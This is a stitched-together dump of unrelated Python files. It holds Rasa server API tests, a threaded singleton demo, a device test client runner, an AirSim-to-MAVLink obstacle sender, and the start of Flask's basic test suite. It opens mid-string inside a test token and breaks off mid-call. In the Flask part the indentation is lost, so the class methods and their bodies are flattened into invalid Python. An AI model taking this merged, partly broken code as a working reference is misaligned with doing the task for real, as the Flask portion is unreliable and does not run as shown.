        "eyJ1c2VyIjp7InVzZXJuYW1lIjoidGVzdHVzZXIiLCJyb"
        "2xlIjoidXNlciJ9fQ.JnMTLYd56qut2w9h7hRQlDm1n3l"
        "HJHOxxC_w7TtwCrs"
    )

    # (conversation, auth header, expected status) in the original order.
    cases = [
        ("testadmin", bearer(admin_token), 200),
        ("testuser", bearer(admin_token), 200),
        ("testadmin", bearer(user_token), 403),
        ("testuser", bearer(user_token), 200),
    ]
    for conversation, headers, expected_status in cases:
        _, response = rasa_secured_app.get(
            f"/conversations/{conversation}/tracker", headers=headers
        )
        assert response.status == expected_status
def test_list_routes(default_agent: Agent):
    """The server registers exactly the documented set of route names."""
    from rasa import server

    app = server.create_app(default_agent, auth_token=None)
    actual = set(utils.list_routes(app).keys())
    expected = {
        "hello",
        "version",
        "status",
        "retrieve_tracker",
        "append_events",
        "replace_events",
        "retrieve_story",
        "execute_action",
        "trigger_intent",
        "predict",
        "add_message",
        "train",
        "evaluate_stories",
        "evaluate_intents",
        "tracker_predict",
        "parse",
        "load_model",
        "unload_model",
        "get_domain",
    }
    assert actual == expected
def test_unload_model_error(rasa_app: SanicTestClient):
    """DELETE /model unloads the currently loaded model (HTTP 204)."""
    _, status_response = rasa_app.get("/status")
    assert status_response.status == 200
    assert status_response.json.get("model_file") is not None

    _, response = rasa_app.delete("/model")
    assert response.status == 204


def test_get_domain(rasa_app: SanicTestClient):
    """GET /domain with a JSON accept header returns all domain sections."""
    _, response = rasa_app.get("/domain", headers={"accept": "application/json"})
    assert response.status == 200
    domain = response.json
    for section in ("config", "intents", "entities", "slots", "responses", "actions"):
        assert section in domain


def test_get_domain_invalid_accept_header(rasa_app: SanicTestClient):
    """GET /domain without an accept header is rejected with HTTP 406."""
    _, response = rasa_app.get("/domain")
    assert response.status == 406
def test_load_model(rasa_app: SanicTestClient, trained_core_model):
    """PUT /model swaps in the new model, changing the reported fingerprint."""

    def current_fingerprint():
        _, status_response = rasa_app.get("/status")
        assert status_response.status == 200
        assert "fingerprint" in status_response.json
        return status_response.json["fingerprint"]

    old_fingerprint = current_fingerprint()
    _, response = rasa_app.put("/model", json={"model_file": trained_core_model})
    assert response.status == 204
    assert current_fingerprint() != old_fingerprint
def test_load_model_from_model_server(rasa_app: SanicTestClient, trained_core_model):
    """Loading a model from a (mocked) remote model server changes the fingerprint."""
    _, response = rasa_app.get("/status")
    assert response.status == 200
    assert "fingerprint" in response.json
    old_fingerprint = response.json["fingerprint"]
    endpoint = EndpointConfig("https://example.com/model/trained_core_model")
    with open(trained_core_model, "rb") as f:
        # Mock aiohttp responses for the model-server URL; passthrough keeps
        # the test client's own loopback requests working.
        with aioresponses(passthrough=["http://127.0.0.1"]) as mocked:
            headers = {}
            fs = os.fstat(f.fileno())
            # fs[6] is st_size (file size in bytes).
            # NOTE(review): `headers` is built but never passed to mocked.get —
            # presumably intended as `headers=headers`; confirm.
            headers["Content-Length"] = str(fs[6])
            mocked.get(
                "https://example.com/model/trained_core_model",
                content_type="application/x-tar",
                body=f.read(),
            )
            data = {"model_server": {"url": endpoint.url}}
            _, response = rasa_app.put("/model", json=data)
            assert response.status == 204
            _, response = rasa_app.get("/status")
            assert response.status == 200
            assert "fingerprint" in response.json
            # Pulling from the server must have replaced the previous model.
            assert old_fingerprint != response.json["fingerprint"]
    import rasa.core.jobs
    # Reset the background model-pull scheduler so it does not leak into other
    # tests. NOTE(review): writes module-private state directly — confirm.
    rasa.core.jobs.__scheduler = None
def test_load_model_invalid_request_body(rasa_app: SanicTestClient):
    """PUT /model without a body is rejected with HTTP 400."""
    _, response = rasa_app.put("/model")
    assert response.status == 400


def test_load_model_invalid_configuration(rasa_app: SanicTestClient):
    """PUT /model with a non-existent model path is rejected with HTTP 400."""
    _, response = rasa_app.put("/model", json={"model_file": "some-random-path"})
    assert response.status == 400
def test_execute(rasa_app: SanicTestClient):
    """Executing a known action returns the updated tracker and bot messages."""
    _create_tracker_for_sender(rasa_app, "test_execute")
    _, response = rasa_app.post(
        "/conversations/test_execute/execute", json={"name": "utter_greet"}
    )
    assert response.status == 200
    body = response.json
    assert body["tracker"]
    assert body["messages"]


def test_execute_with_missing_action_name(rasa_app: SanicTestClient):
    """An execute payload without a "name" key is rejected with HTTP 400."""
    test_sender = "test_execute_with_missing_action_name"
    _create_tracker_for_sender(rasa_app, test_sender)
    _, response = rasa_app.post(
        f"/conversations/{test_sender}/execute", json={"wrong-key": "utter_greet"}
    )
    assert response.status == 400


def test_execute_with_not_existing_action(rasa_app: SanicTestClient):
    """Executing an unknown action surfaces as HTTP 500."""
    test_sender = "test_execute_with_not_existing_action"
    _create_tracker_for_sender(rasa_app, test_sender)
    _, response = rasa_app.post(
        f"/conversations/{test_sender}/execute", json={"name": "ka[pa[opi[opj[oj[oija"}
    )
    assert response.status == 500
def test_trigger_intent(rasa_app: SanicTestClient):
    """Triggering a known intent returns the updated tracker and messages."""
    _, response = rasa_app.post(
        "/conversations/test_trigger/trigger_intent", json={"name": "greet"}
    )
    assert response.status == 200
    body = response.json
    assert body["tracker"]
    assert body["messages"]


def test_trigger_intent_with_missing_intent_name(rasa_app: SanicTestClient):
    """A trigger payload without a "name" key is rejected with HTTP 400."""
    test_sender = "test_trigger_intent_with_missing_action_name"
    _, response = rasa_app.post(
        f"/conversations/{test_sender}/trigger_intent", json={"wrong-key": "greet"}
    )
    assert response.status == 400


def test_trigger_intent_with_not_existing_intent(rasa_app: SanicTestClient):
    """Triggering an unknown intent is rejected with HTTP 404."""
    test_sender = "test_trigger_intent_with_not_existing_intent"
    _create_tracker_for_sender(rasa_app, test_sender)
    _, response = rasa_app.post(
        f"/conversations/{test_sender}/trigger_intent",
        json={"name": "ka[pa[opi[opj[oj[oija"},
    )
    assert response.status == 404
@pytest.mark.parametrize(
    "input_channels, output_channel_to_use, expected_channel",
    [
        (None, "slack", CollectingOutputChannel),
        ([], None, CollectingOutputChannel),
        ([RestInput()], "slack", CollectingOutputChannel),
        ([RestInput()], "rest", CollectingOutputChannel),
        ([RestInput(), SlackInput("test")], "slack", SlackBot),
    ],
)
def test_get_output_channel(
    input_channels: List[Text], output_channel_to_use, expected_channel: Type
):
    """_get_output_channel resolves the requested channel from the app config."""
    mock_app = MagicMock()
    mock_app.input_channels = input_channels
    mock_request = MagicMock()
    mock_request.app = mock_app
    mock_request.args = {"output_channel": output_channel_to_use}

    channel = rasa.server._get_output_channel(mock_request, None)
    assert isinstance(channel, expected_channel)
@pytest.mark.parametrize(
    "input_channels, expected_channel",
    [
        ([], CollectingOutputChannel),
        ([RestInput()], CollectingOutputChannel),
        ([RestInput(), SlackInput("test")], SlackBot),
    ],
)
def test_get_latest_output_channel(input_channels: List[Text], expected_channel: Type):
    """output_channel=latest resolves the channel of the last user message."""
    mock_app = MagicMock()
    mock_app.input_channels = input_channels
    mock_request = MagicMock()
    mock_request.app = mock_app
    mock_request.args = {"output_channel": "latest"}

    tracker = DialogueStateTracker.from_events(
        "default", [UserUttered("text", input_channel="slack")]
    )
    channel = rasa.server._get_output_channel(mock_request, tracker)
    assert isinstance(channel, expected_channel)
def test_app_when_app_has_no_input_channels():
    """Without configured input channels the fallback is CollectingOutputChannel."""
    mock_request = MagicMock()

    class NoInputChannels:
        pass

    mock_request.app = NoInputChannels()
    channel = rasa.server._get_output_channel(
        mock_request, DialogueStateTracker.from_events("default", [])
    )
    assert isinstance(channel, CollectingOutputChannel)
|
singleton.py | import time
import threading
# 打印缓冲区锁
# print buffer lock
print_lock = threading.Lock()
class Singleton():
    """Lazily-constructed, thread-safe singleton (demo).

    Always obtain the shared object via ``Singleton.instance()``; calling
    ``Singleton()`` directly creates an independent object.
    """

    _instance_lock = threading.Lock()

    def __init__(self):
        # Deliberately slow construction so concurrent callers exercise the lock.
        time.sleep(1)

    @classmethod
    def instance(cls):
        """Return the single shared instance, creating it on first use.

        The original acquire()/release() pair leaked the lock if construction
        raised; ``with`` guarantees release. The outer check is a fast path
        (double-checked locking) once the instance exists.
        """
        if not hasattr(Singleton, "_instance"):
            with Singleton._instance_lock:
                # Re-check inside the lock: another thread may have won the race.
                if not hasattr(Singleton, "_instance"):
                    Singleton._instance = Singleton()
        return Singleton._instance
def task():
    """Worker: fetch the shared singleton and print it under the print lock."""
    # 必须通过.instance()进行创建单例实例,直接Singleton创建的并不是单例模式
    # Create via Singleton.instance(); calling Singleton() directly bypasses
    # the singleton and builds a fresh object.
    obj = Singleton.instance()
    # `with` releases the lock even if print raises; print(obj) replaces the
    # Python 2 `print obj` statement, which is a SyntaxError under Python 3.
    with print_lock:
        print(obj)
# Spawn ten workers that race to create the singleton.
for _ in range(10):
    worker = threading.Thread(target=task)
    worker.start()
client_runner.py | """
Copyright 2019-2020 Pelion.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from copy import deepcopy
import logging
import queue
import threading
from time import time
import pelion_test_lib.tools.utils as utils
# Dedicated file logger: every line the client prints is mirrored to
# client.log with thread names, independent of the console logger below.
flog = logging.getLogger('ClientRunner')
flog.setLevel(logging.DEBUG)
fh = logging.FileHandler('client.log')
fh.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s:%(name)s:%(threadName)s:%(levelname)s: %(message)s')
fh.setFormatter(formatter)
flog.addHandler(fh)

# Module logger for the runner's own diagnostics.
log = logging.getLogger(__name__)
class Client:
    """
    Client runner class that handles communication for given dut object.

    A daemon reader thread consumes raw lines from the dut, strips terminal
    escape sequences and queues cleaned lines; ``wait_for_output()`` polls
    that queue for expected strings.

    :param dut: Running client object
    :param trace: Log the raw client output
    :param name: Logging name for the client
    """

    def __init__(self, dut, trace=False, name='0'):
        self._ep_id = None
        self.name = name
        self.trace = trace
        self.run = True
        self.iq = queue.Queue()
        self.dut = dut
        input_thread_name = '<-- D{}'.format(name)
        it = threading.Thread(target=self._input_thread, name=input_thread_name)
        # Thread.daemon replaces the deprecated setDaemon() call; the reader
        # thread must not keep the interpreter alive at shutdown.
        it.daemon = True
        log.info('Starting runner threads for client "D{}"'.format(self.name))
        it.start()

    def _input_thread(self):
        """
        Runner's input thread: read, clean and queue output lines from the dut.
        """
        while self.run:
            line = self.dut.readline()
            if not line:
                continue
            plain_line = utils.strip_escape(line)
            # With several carriage returns, keep the last complete segment.
            if b'\r' in line and line.count(b'\r') > 1:
                plain_line = plain_line.split(b'\r')[-2]
            plain_line = plain_line.replace(b'\t', b' ').decode('utf-8', 'replace')
            flog.info('<--|D{}| {}'.format(self.name, plain_line.strip()))
            if self.trace:
                log.debug('Raw output: {}'.format(line))
            if b'Error' in line:
                log.error('Output: {}'.format(line))
            self.iq.put(plain_line)

    def _read_line(self, timeout):
        """
        Read data from input queue
        :param timeout: Timeout
        :return: Data from queue
        :raises queue.Empty: if nothing arrives within the timeout
        """
        return self.iq.get(timeout=timeout)

    def clear_input(self):
        """
        Clear input queue messages
        """
        with self.iq.mutex:
            self.iq.queue.clear()

    def kill(self):
        """
        Kill the client runner (stops the reader thread's loop)
        """
        log.debug('Killing client "D{}" runner...'.format(self.name))
        self.run = False

    def reset(self):
        """
        Send reset to client
        """
        self.dut.reset()

    def endpoint_id(self, wait_for_response=10):
        """
        Get endpoint id from client
        :param wait_for_response: Timeout waiting the response
        :return: Endpoint id, or None if it could not be parsed in time
        """
        if self._ep_id is None:
            ep_line = self.wait_for_output('Device Id:', wait_for_response)
            if ep_line is not None:
                ep_array = ep_line.split()
                # Expect "... Device Id: <id>" -> at least three tokens.
                # The previous `> 1` guard allowed an IndexError on index 2.
                if len(ep_array) > 2:
                    self._ep_id = ep_array[2]
        return self._ep_id

    def wait_for_output(self, search, timeout=60, assert_errors=True, ignore_case=True, errors=None):
        """
        Wait for expected output response
        :param search: Expected response string
        :param timeout: Response waiting time
        :param assert_errors: Assert on error situations
        :param ignore_case: Ignore client output's casing
        :param errors: String(s) that should cause error
        :return: Response line with expected string or None if either line containing
        one of the errors strings was found or timeout was reached (and assert_errors was False)
        """
        if errors is None:
            errors = []
        elif isinstance(errors, str):
            errors = [errors]
        if ignore_case:
            search = search.lower()
            # Build a new list so the caller's `errors` list is not mutated.
            errors = [error.lower() for error in errors]
        return self._do_wait_for_output(search, errors, timeout, assert_errors, ignore_case)

    def _do_wait_for_output(self, search, errors, timeout, assert_errors, ignore_case):
        """
        Poll the input queue until `search` (or one of `errors`) appears in a
        line, or until `timeout` seconds have elapsed.
        """
        start = time()
        now = 0
        timeout_error_msg = 'Didn\'t find {} in {} s'.format(search, timeout)

        def idle(last):
            """One tick without output; returns (new_now, timed_out).

            Consolidates the timeout handling that was duplicated between the
            empty-line branch and the queue.Empty handler.
            """
            current = time()
            if current - start >= timeout:
                if assert_errors:
                    assert False, timeout_error_msg
                log.warning(timeout_error_msg)
                return current, True
            if current - last > 1:
                log.debug('Waiting for "{}" string... Timeout in {:.0f} s'.format(
                    search, abs(current - start - timeout)))
            return current, False

        while True:
            try:
                line = self._read_line(1)
            except queue.Empty:
                now, timed_out = idle(now)
                if timed_out:
                    break
                continue
            if not line:
                now, timed_out = idle(now)
                if timed_out:
                    break
                continue
            if ignore_case:
                line = line.lower()
            if search in line:
                end = time()
                log.debug('Expected string "{}" found! [time][{:.4f} s]'.format(search, end - start))
                return line
            for error in errors:
                if error in line:
                    end = time()
                    log.debug('Expected error string "{}" found! [time][{:.4f} s]'.format(error, end - start))
                    break
            else:
                continue
            if assert_errors:
                assert False, 'Error string found from line "{}"'.format(line)
            return None
        # Timed out without assert_errors -> signal "not found".
        return None
|
air_sim_to_mavlink.py | # Install required packages:
#
# pip3 install pymavlink
# pip3 install apscheduler
# pip3 install opencv-python
# pip3 install airsim
# pip3 install numpy
# sudo apt-get install python-PIL
import math
import sys
import time
import airsim
from cv2 import cv2
import numpy as np
from PIL import Image
import threading
from time import sleep
from apscheduler.schedulers.background import BackgroundScheduler
from pymavlink import mavutil
import argparse
sys.path.append("/usr/local/lib/")
# Set MAVLink protocol to 2.
import os
os.environ["MAVLINK20"] = "1"
######################################################
## Parsing user' inputs ##
######################################################
parser = argparse.ArgumentParser(description='Reboots vehicle')
parser.add_argument('--connect',
                    help="Vehicle connection target string. If not specified, a default string will be used.")
parser.add_argument('--baudrate', type=float,
                    help="Vehicle connection baudrate. If not specified, a default value will be used.")
parser.add_argument('--obstacle_distance_msg_hz', type=float,
                    help="Update frequency for OBSTACLE_DISTANCE message. If not specified, a default value will be used.")
args = parser.parse_args()

# Default configurations for connection to the FCU.
connection_string = args.connect if args.connect else 'localhost:14551'
connection_baudrate = args.baudrate if args.baudrate else 921600
obstacle_distance_msg_hz = args.obstacle_distance_msg_hz if args.obstacle_distance_msg_hz else 15

# AirSim API
client = airsim.MultirotorClient()
client.confirmConnection()
client.enableApiControl(True)

DEPTH_RANGE_M = [0.3, 12]  # depth range, to be changed as per requirements
MAX_DEPTH = 9999  # arbitrary large number, also used as the "no obstacle" sentinel

# Shared between the main thread and the mavlink sender thread.
# np.float was removed in NumPy 1.24; the builtin float dtype is equivalent.
mavlink_obstacle_coordinates = np.ones((9, 3), dtype=float) * MAX_DEPTH

# get time in correct format
start_time = int(round(time.time() * 1000))


def current_milli_time():
    """Milliseconds elapsed since script start."""
    return int(round(time.time() * 1000) - start_time)
# get depth from airsim backend
def get_depth(client):
    """Fetch one planner-depth float image from AirSim's front_center camera.

    :return: (2-D depth array, image width, image height)
    """
    request = airsim.ImageRequest(
        'front_center', airsim.ImageType.DepthPlanner,
        pixels_as_float=True, compress=False)
    response = client.simGetImages([request])[0]
    depth = airsim.list_to_2d_float_array(
        response.image_data_float, response.width, response.height)
    depth = np.expand_dims(depth, axis=2).squeeze()
    return depth, response.width, response.height
# this method converts, (x,y) from depth matrix to NEU 3-D vector in body frame
def convert_depth_3D_vec(x_depth, y_depth, depth, fov):
    """Project a depth-image pixel (x_depth, y_depth) to an NEU body-frame vector.

    Pinhole model: the focal length is derived from the image width and the
    horizontal field of view (radians).
    https://stackoverflow.com/questions/62046666/find-3d-coordinate-with-respect-to-the-camera-using-2d-image-coordinates

    :return: (forward, right, up) components in the body frame
    """
    height, width = depth.shape
    cx, cy = width // 2, height // 2
    focal_len = width / (2 * np.tan(fov / 2))
    forward = depth[y_depth, x_depth]
    right = (x_depth - cx) * forward / focal_len
    up = -(y_depth - cy) * forward / focal_len
    return forward, right, up
# divide the depth data into a 3x3 grid. Pick out the smallest distance in each grid
# store the x,y of the depth matrix, the 9 depths, and convert them into body-frame x,y,z
def distances_from_depth_image(depth_mat, min_depth_m, max_depth_m, depth, depth_coordinates, obstacle_coordinates, valid_depth):
    """Divide the depth image into a 3x3 grid and find each cell's nearest point.

    All four output arrays are mutated in place, one entry per grid cell i
    (row-major, 0..8):
      depth[i]               -> smallest euclidean distance found in cell i
      depth_coordinates[i]   -> (x, y) pixel of that point
      obstacle_coordinates[i]-> body-frame (x, y, z) of that point
      valid_depth[i]         -> True once a point within [min, max] range is found
    Cells are sampled on a sub-grid (step = image size / 20), not per-pixel.
    """
    # Parameters for depth image
    depth_img_width = depth_mat.shape[1]
    depth_img_height = depth_mat.shape[0]
    # Sampling step inside each cell (float: x/y advance fractionally).
    step_x = depth_img_width / 20
    step_y = depth_img_height / 20
    # Right/bottom edge of the current cell; starts at the first cell.
    sampling_width = int(1/3 * depth_img_width)
    sampling_height = int(1/3 * depth_img_height)
    # divide the frame into 3x3 grid to find the minimum depth value in "9 boxes"
    for i in range(9):
        if i % 3 == 0 and i != 0:
            # New grid row: reset the column edge, advance the row edge.
            sampling_width = int(1/3 * depth_img_width)
            sampling_height = sampling_height + int(1/3 * depth_img_height)
        x, y = 0, 0
        # Left edge of the current cell.
        x = sampling_width - int(1/3 * depth_img_width)
        while x < sampling_width:
            # NOTE(review): the step is added before sampling, so the first
            # column/row of each cell is never sampled — confirm intended.
            x = x + step_x
            y = sampling_height - int(1/3 * depth_img_height)
            while y < sampling_height:
                y = y + step_y
                # make sure coordinates stay within matrix limits
                x_pixel = 0 if x < 0 else depth_img_width-1 if x > depth_img_width -1 else int(x)
                y_pixel = 0 if y < 0 else depth_img_height-1 if y > depth_img_height -1 else int(y)
                # convert depth to body-frame x,y,z
                x_obj, y_obj, z_obj = convert_depth_3D_vec(x_pixel, y_pixel, depth_mat, math.radians(90))
                # actual euclidean distance to obstacle
                point_depth = (x_obj*x_obj + y_obj*y_obj + z_obj*z_obj)**0.5
                # if within valid range and closer than what we have, keep it
                if point_depth <= depth[i] and point_depth > min_depth_m and point_depth < max_depth_m:
                    depth[i] = point_depth
                    depth_coordinates[i] = [x_pixel, y_pixel]
                    obstacle_coordinates[i] = [x_obj, y_obj, z_obj]
                    valid_depth[i] = True
        # Advance to the next cell in this grid row.
        sampling_width = sampling_width + int(1/3 * depth_img_width)
# display depth image from AirSim. The data received from AirSim needs to be proceeded for a good view
# also divides the view into 3x3 grid and prints smallest depth value in each grid
# puts a circle on the smallest found depth value
def getScreenDepthVis(client, depth_coordinates, depth_list):
    """Render the AirSim depth image with a 3x3 grid overlay.

    Draws a circle on the nearest point found in each grid cell and prints
    its distance; cells whose depth exceeds DEPTH_RANGE_M[1] are skipped.
    """
    # get image from airsim
    responses = client.simGetImages([airsim.ImageRequest(0, airsim.ImageType.DepthPlanner, True, False)])
    # condition the data for display
    # np.float was removed in NumPy 1.24; np.float64 is the same dtype.
    img1d = np.array(responses[0].image_data_float, dtype=np.float64)
    img1d = 255/np.maximum(np.ones(img1d.size), img1d)
    img2d = np.reshape(img1d, (responses[0].height, responses[0].width))
    image = np.invert(np.array(Image.fromarray(img2d.astype(np.uint8), mode='L')))
    factor = 10
    maxIntensity = 255.0  # depends on dtype of image data
    # Decrease intensity such that dark pixels become much darker, bright pixels become slightly dark
    newImage1 = (maxIntensity)*(image/maxIntensity)**factor
    newImage1 = newImage1.astype(np.uint8)
    color_img = cv2.applyColorMap(newImage1, cv2.COLORMAP_JET)
    # divide view into 3x3 matrix
    pxstep = int(newImage1.shape[1]/3)
    pystep = int(newImage1.shape[0]/3)
    gx = pxstep
    gy = pystep
    while gx < newImage1.shape[1]:
        cv2.line(color_img, (gx, 0), (gx, newImage1.shape[0]), color=(0, 0, 0), thickness=1)
        gx += pxstep
    while gy < newImage1.shape[0]:
        cv2.line(color_img, (0, gy), (newImage1.shape[1], gy), color=(0, 0, 0), thickness=1)
        gy += pystep
    # print circle and depth values on the screen
    for i in range(len(depth_list)):
        if depth_list[i] <= DEPTH_RANGE_M[1]:
            color_img = cv2.circle(color_img, (int(depth_coordinates[i][0]), int(depth_coordinates[i][1])), 5, (0, 0, 0), 5)
            color_img = cv2.putText(color_img, str(round(depth_list[i], 2)), (int(pxstep*(1/4 + i % 3)), int(pystep*(1/3 + math.floor(i/3)))), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 0, 255), 2)
    cv2.imshow("Depth Vis", color_img)
    cv2.waitKey(1)
def mavlink_loop(conn, callbacks):
    """Thread main: heartbeat the FCU and dispatch interesting messages.

    Reads from a mavlink connection and calls the callback registered for
    each received message type; runs until the process exits.
    """
    interesting_messages = list(callbacks.keys())
    while True:
        # Keep announcing ourselves as an onboard controller.
        conn.mav.heartbeat_send(
            mavutil.mavlink.MAV_TYPE_ONBOARD_CONTROLLER,
            mavutil.mavlink.MAV_AUTOPILOT_GENERIC,
            0,
            0,
            0)
        message = conn.recv_match(type=interesting_messages, timeout=1, blocking=True)
        if message is not None:
            callbacks[message.get_type()](message)
# send mavlink message to SITL
def send_obstacle_distance_3D_message():
    """Send one OBSTACLE_DISTANCE_3D message per 3x3 grid cell to the FCU."""
    global conn
    # Renamed from `time`: the original local shadowed the stdlib time module.
    timestamp_ms = current_milli_time()
    # print(mavlink_obstacle_coordinates)
    for i in range(9):
        conn.mav.obstacle_distance_3d_send(
            timestamp_ms,  # ms since script start (current_milli_time is milliseconds, not us)
            0,  # sensor type: not implemented in ArduPilot
            0,  # frame: not implemented in ArduPilot
            65535,  # unknown object ID; we are not really detecting the type of obstacle
            float(mavlink_obstacle_coordinates[i][0]),  # X in NEU body frame
            float(mavlink_obstacle_coordinates[i][1]),  # Y in NEU body frame
            float(mavlink_obstacle_coordinates[i][2]),  # Z in NEU body frame
            float(DEPTH_RANGE_M[0]),  # min range of sensor
            float(DEPTH_RANGE_M[1])   # max range of sensor
        )
# Connection to the flight controller (SITL); force_connected allows sending
# without waiting for a heartbeat first.
conn = mavutil.mavlink_connection(
    device = str(connection_string),
    autoreconnect = True,
    source_system = 1,
    source_component = 93,
    baud=connection_baudrate,
    force_connected=True,
)
# No incoming message types are handled yet; mavlink_loop only heartbeats.
mavlink_callbacks = {
}
# NOTE(review): this thread is not marked daemon, so the process will not
# exit while mavlink_loop runs even if the main loop stops — confirm intended.
mavlink_thread = threading.Thread(target=mavlink_loop, args=(conn, mavlink_callbacks))
mavlink_thread.start()

# Send MAVlink messages in the background at pre-determined frequencies
sched = BackgroundScheduler()
sched.add_job(send_obstacle_distance_3D_message, 'interval', seconds = 1/obstacle_distance_msg_hz)
sched.start()
# main loop
# main loop: grab a depth frame, reduce it to 9 nearest obstacles, publish.
while True:
    # depth image from airsim
    depth_mat, width, height = get_depth(client)
    # Smallest depth found in each grid cell; initialized just out of range.
    # np.float and np.bool were removed in NumPy 1.24; use builtin dtypes.
    depth_list = np.ones((9,), dtype=float) * (DEPTH_RANGE_M[1] + 1)
    # Cells with a valid in-range depth are marked True.
    valid_depth = np.zeros((9,), dtype=bool)
    # Pixel coordinates of the smallest depth in each cell.
    depth_coordinates = np.ones((9, 2), dtype=np.uint16) * MAX_DEPTH
    # Body-frame NEU XYZ coordinates of obstacles to be sent to the vehicle.
    obstacle_coordinates = np.ones((9, 3), dtype=float) * MAX_DEPTH
    # get the obstacles
    distances_from_depth_image(depth_mat, DEPTH_RANGE_M[0], DEPTH_RANGE_M[1], depth_list, depth_coordinates, obstacle_coordinates, valid_depth)
    # Publish valid cells; invalid cells get the MAX_DEPTH sentinel.
    for i in range(9):
        if valid_depth[i]:
            mavlink_obstacle_coordinates[i] = obstacle_coordinates[i]
        else:
            mavlink_obstacle_coordinates[i] = MAX_DEPTH
    # visualize the data
    getScreenDepthVis(client, depth_coordinates, depth_list)
|
basic.py | # -*- coding: utf-8 -*-
"""
flask.testsuite.basic
~~~~~~~~~~~~~~~~~~~~~
The basic functionality.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import re
import uuid
import flask
import pickle
import unittest
from datetime import datetime
from threading import Thread
from flask.testsuite import FlaskTestCase, emits_module_deprecation_warning
from flask._compat import text_type
from werkzeug.exceptions import BadRequest, NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
class BasicFunctionalityTestCase(FlaskTestCase):
def test_options_work(self):
    """An automatic OPTIONS response advertises every method the rule accepts."""
    app = flask.Flask(__name__)

    @app.route('/', methods=['GET', 'POST'])
    def index():
        return 'Hello World'

    response = app.test_client().open('/', method='OPTIONS')
    self.assert_equal(sorted(response.allow), ['GET', 'HEAD', 'OPTIONS', 'POST'])
    # The automatic OPTIONS response carries no body.
    self.assert_equal(response.data, b'')
def test_options_on_multiple_rules(self):
    """OPTIONS merges the allowed methods from every rule on the same path."""
    app = flask.Flask(__name__)

    @app.route('/', methods=['GET', 'POST'])
    def index():
        return 'Hello World'

    @app.route('/', methods=['PUT'])
    def index_put():
        return 'Aha!'

    response = app.test_client().open('/', method='OPTIONS')
    self.assert_equal(sorted(response.allow),
                      ['GET', 'HEAD', 'OPTIONS', 'POST', 'PUT'])
def test_options_handling_disabled(self):
app = flask.Flask(__name__)
def index():
return 'Hello World!'
index.provide_automatic_options = False
app.route('/')(index)
rv = app.test_client().open('/', method='OPTIONS')
self.assert_equal(rv.status_code, 405)
app = flask.Flask(__name__)
def index2():
return 'Hello World!'
index2.provide_automatic_options = True
app.route('/', methods=['OPTIONS'])(index2)
rv = app.test_client().open('/', method='OPTIONS')
self.assert_equal(sorted(rv.allow), ['OPTIONS'])
def test_request_dispatching(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.request.method
@app.route('/more', methods=['GET', 'POST'])
def more():
return flask.request.method
c = app.test_client()
self.assert_equal(c.get('/').data, b'GET')
rv = c.post('/')
self.assert_equal(rv.status_code, 405)
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS'])
rv = c.head('/')
self.assert_equal(rv.status_code, 200)
self.assert_false(rv.data) # head truncates
self.assert_equal(c.post('/more').data, b'POST')
self.assert_equal(c.get('/more').data, b'GET')
rv = c.delete('/more')
self.assert_equal(rv.status_code, 405)
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS', 'POST'])
def test_url_mapping(self):
app = flask.Flask(__name__)
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule('/', 'index', index)
app.add_url_rule('/more', 'more', more, methods=['GET', 'POST'])
c = app.test_client()
self.assert_equal(c.get('/').data, b'GET')
rv = c.post('/')
self.assert_equal(rv.status_code, 405)
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS'])
rv = c.head('/')
self.assert_equal(rv.status_code, 200)
self.assert_false(rv.data) # head truncates
self.assert_equal(c.post('/more').data, b'POST')
self.assert_equal(c.get('/more').data, b'GET')
rv = c.delete('/more')
self.assert_equal(rv.status_code, 405)
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS', 'POST'])
def test_werkzeug_routing(self):
from werkzeug.routing import Submount, Rule
app = flask.Flask(__name__)
app.url_map.add(Submount('/foo', [
Rule('/bar', endpoint='bar'),
Rule('/', endpoint='index')
]))
def bar():
return 'bar'
def index():
return 'index'
app.view_functions['bar'] = bar
app.view_functions['index'] = index
c = app.test_client()
self.assert_equal(c.get('/foo/').data, b'index')
self.assert_equal(c.get('/foo/bar').data, b'bar')
def test_endpoint_decorator(self):
from werkzeug.routing import Submount, Rule
app = flask.Flask(__name__)
app.url_map.add(Submount('/foo', [
Rule('/bar', endpoint='bar'),
Rule('/', endpoint='index')
]))
@app.endpoint('bar')
def bar():
return 'bar'
@app.endpoint('index')
def index():
return 'index'
c = app.test_client()
self.assert_equal(c.get('/foo/').data, b'index')
self.assert_equal(c.get('/foo/bar').data, b'bar')
def test_session(self):
    """A value stored in the session in one request is readable in the next."""
    app = flask.Flask(__name__)
    app.secret_key = 'testkey'

    @app.route('/set', methods=['POST'])
    def set():
        flask.session['value'] = flask.request.form['value']
        return 'value set'

    @app.route('/get')
    def get():
        return flask.session['value']

    client = app.test_client()
    response = client.post('/set', data={'value': '42'})
    self.assert_equal(response.data, b'value set')
    self.assert_equal(client.get('/get').data, b'42')
def test_session_using_server_name(self):
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='example.com'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com/')
self.assert_in('domain=.example.com', rv.headers['set-cookie'].lower())
self.assert_in('httponly', rv.headers['set-cookie'].lower())
def test_session_using_server_name_and_port(self):
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='example.com:8080'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com:8080/')
self.assert_in('domain=.example.com', rv.headers['set-cookie'].lower())
self.assert_in('httponly', rv.headers['set-cookie'].lower())
def test_session_using_server_name_port_and_path(self):
app = flask.Flask(__name__)
app.config.update(
